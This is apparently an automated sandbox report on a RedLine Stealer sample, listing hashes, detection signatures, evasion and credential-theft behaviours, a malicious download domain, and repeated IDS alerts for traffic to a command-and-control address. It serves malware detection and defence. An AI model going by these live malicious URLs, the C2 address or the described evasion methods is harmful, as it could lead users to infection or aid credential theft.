Windows Analysis Report
zkwindow.exe

Overview

General Information

Sample name: zkwindow.exe
Analysis ID: 1634350
MD5: bd04d8b3cc0b6a257d2f73e726e7cbec
SHA1: a7d0cf73d777ed4e7b4c2ea074c3d0eb4601a85b
SHA256: 1bf736bd8a06776dcb75a947d027e0ece226c52115a18e1c834bed393d9df53f
Infos:

Detection

RedLine
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected RedLine Stealer
Connects to many ports of the same IP (likely port scanning)
Drops password protected ZIP file
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Maps a DLL or memory area into another process
Obfuscated command line found
Powershell drops PE file
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: PowerShell Base64 Encoded Invoke Keyword
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Potential key logger detected (key state polling based)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 7zip to decompress a password protected archive
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

Name Description Attribution Blogpost URLs Link
RedLine Stealer RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer. No Attribution https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

AV Detection
barindex
Antivirus detection for URL or domain
Source: https://main-connection.click/Download_StarW3_pack.zip8 Avira URL Cloud: Label: malware
Source: https://main-connection.click/Download_StarW3_pack.zip Avira URL Cloud: Label: malware
Source: https://main-connection.click/archive. Avira URL Cloud: Label: malware
Source: https://main-connection.click Avira URL Cloud: Label: malware
Source: http://main-connection.click Avira URL Cloud: Label: malware
Source: https://main-connection.click/archive.zip Avira URL Cloud: Label: malware
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp Avira: detection malicious, Label: TR/Agent.dtyjl
Source: C:\Users\user\AppData\Local\Temp\vpdcuvm Avira: detection malicious, Label: TR/Agent.dtyjl
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\bmrmmwsgmayisp ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\vpdcuvm ReversingLabs: Detection: 73%
Multi AV Scanner detection for submitted file
Source: zkwindow.exe Virustotal: Detection: 18% Perma Link
Joe Sandbox ML detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D4D094 CryptAcquireContextA,GetLastError,CryptGenRandom,GetLastError, 11_2_00D4D094
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D7147C CryptReleaseContext, 11_2_00D7147C
Source: unknown HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49715 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49718 version: TLS 1.2
Source: zkwindow.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: F:\scintilla\bin\Scintilla.pdb source: AUpdate.exe, 0000000B.00000002.1620913384.0000000001636000.00000002.00000001.01000000.0000000A.sdmp, isscint.dll.9.dr
Source: Binary string: wntdll.pdbUGP source: AUpdate.exe, 0000000B.00000002.1627708957.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000002.1630180715.0000000009D60000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806736742.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1807001804.0000000005010000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069294606.0000000004E15000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2070356635.00000000052F0000.00000004.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: AUpdate.exe, 0000000B.00000002.1627708957.0000000009A0D000.00000004.00000020.00020000.00000000.sdmp, AUpdate.exe, 0000000B.00000002.1630180715.0000000009D60000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1806736742.0000000004B3D000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000C.00000002.1807001804.0000000005010000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2069294606.0000000004E15000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000010.00000002.2070356635.00000000052F0000.00000004.00001000.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D44C4 FindFirstFileExW, 0_2_00007FF7013D44C4
Source: C:\Users\user\Desktop\zkwindow.exe Code function: 0_2_00007FF7013D4648 FindFirstFileExW,FindNextFileW,FindClose,FindClose, 0_2_00007FF7013D4648
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008E91B4 FindFirstFileW,FindFirstFileW,free, 9_2_008E91B4
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D4C85C FindFirstFileW,FindNextFileW,FindClose, 11_2_00D4C85C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D68844 FindFirstFileW,FindNextFileW,FindClose, 11_2_00D68844
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D6082C FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose, 11_2_00D6082C
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00D609B8 FindFirstFileW,FindNextFileW,FindClose, 11_2_00D609B8
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C4B190 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW, 11_2_00C4B190
Source: C:\Users\user\AppData\Local\Temp\_6f5e391431ff4a2e9ea50f049e46bc47\AUpdate.exe Code function: 11_2_00C4B75C FindFirstFileW,FindClose, 11_2_00C4B75C
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 9_2_008EA254 free,free,GetLogicalDriveStringsW,GetLogicalDriveStringsW,free,free,free, 9_2_008EA254
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov r9, qword ptr [rdi+40h] 9_2_009BC0D0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov eax, dword ptr [rbp+00000120h] 9_2_00990040
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then cmp dword ptr [rdi], 11h 9_2_009A02F0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov ecx, dword ptr [r9] 9_2_009B43E0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then cmp ebp, 00010000h 9_2_0099C4D0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov rbx, rdi 9_2_009C4510
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov ecx, dword ptr [rdx-08h] 9_2_009AC530
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then movzx eax, byte ptr [r11] 9_2_009AC530
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov edx, eax 9_2_009926F0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov dword ptr [rax+78h], edx 9_2_009C0780
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then add rcx, rcx 9_2_009B0770
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then cmp byte ptr [rdi+000001ECh], r12L 9_2_009969E0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov rax, qword ptr [rbx+000001A0h] 9_2_00992900
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov r10, qword ptr [r11-08h] 9_2_009C4930
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then movzx eax, byte ptr [rcx] 9_2_009A0940
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then movzx eax, byte ptr [r9+01h] 9_2_009AA970
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov r9d, ebx 9_2_009B8B90
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then lea edx, dword ptr [rdi+rdi] 9_2_0099CBF0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov rax, qword ptr [rbp+00000080h] 9_2_00998D10
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then inc edx 9_2_009B8D70
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov rax, r8 9_2_009B8EE0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then movzx eax, byte ptr [r15+rsi] 9_2_009B0E10
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then add rbp, 10h 9_2_009A1020
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov edx, dword ptr [rsp+40h] 9_2_009A1020
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov ecx, ebx 9_2_009B51F0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov edx, dword ptr [r9+04h] 9_2_009952A0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov edx, dword ptr [r8+04h] 9_2_009952A0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov qword ptr [rcx], rbx 9_2_009C53F0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov byte ptr [rax-01h], bl 9_2_009A14B0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov edx, dword ptr [rsp+rbp*4+30h] 9_2_009A14B0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov eax, dword ptr [r8] 9_2_009AD6D0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov ecx, dword ptr [rbx+70h] 9_2_009BD640
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov qword ptr [rsp+rax*8+30h], FFFFFFFFFFFFFFFFh 9_2_009BD640
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then movzx ecx, byte ptr [rdx-01h] 9_2_009AB720
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov r11d, dword ptr [rcx+r10*4-04h] 9_2_009BDC10
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then movzx r8d, byte ptr [r11-01h] 9_2_0099BD41
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then movzx r8d, byte ptr [r11-01h] 9_2_0099BD40
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov qword ptr [rcx], rdx 9_2_009A9FC0
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov edx, dword ptr [r8+04h] 9_2_00995F50
Source: C:\Users\user\AppData\Local\Temp\7zip\7za.exe Code function: 4x nop then mov edx, dword ptr [r8+04h] 9_2_00995F50

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49733 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49739 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49730 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49740 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49732 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49744 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49731 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49736 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49743 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49750 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49737 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49752 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49742 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49745 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49747 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49748 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49749 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49734 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49735 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49741 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49727 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49738 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49728 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49746 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49729 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49751 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49755 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49754 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49753 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49756 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49760 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49759 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49758 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49757 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49761 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49762 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49763 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49764 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49767 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49765 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49779 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49772 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49775 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49766 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49768 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49780 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49769 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49770 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49771 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49773 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49784 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49774 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49783 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49776 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49777 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49782 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49781 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49785 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49786 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49787 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49789 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49788 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49778 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49791 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49793 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49792 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49795 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49796 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49797 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49798 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49799 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49800 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49801 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49794 -> 92.255.85.36:9000
Source: Network traffic Suricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49790 -> 92.255.85.36:9000
Connects to many ports of the same IP (likely port scanning)
Source: global traffic TCP traffic: 92.255.85.36 ports 9000,1,4,5,7,8,15847
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49727 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49727
Source: unknown Network traffic detected: HTTP traffic on port 49728 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49728
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49731 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49731
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 9000
Source: unknown Network traffic detected: HTTP traffic on port 9000 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 9000
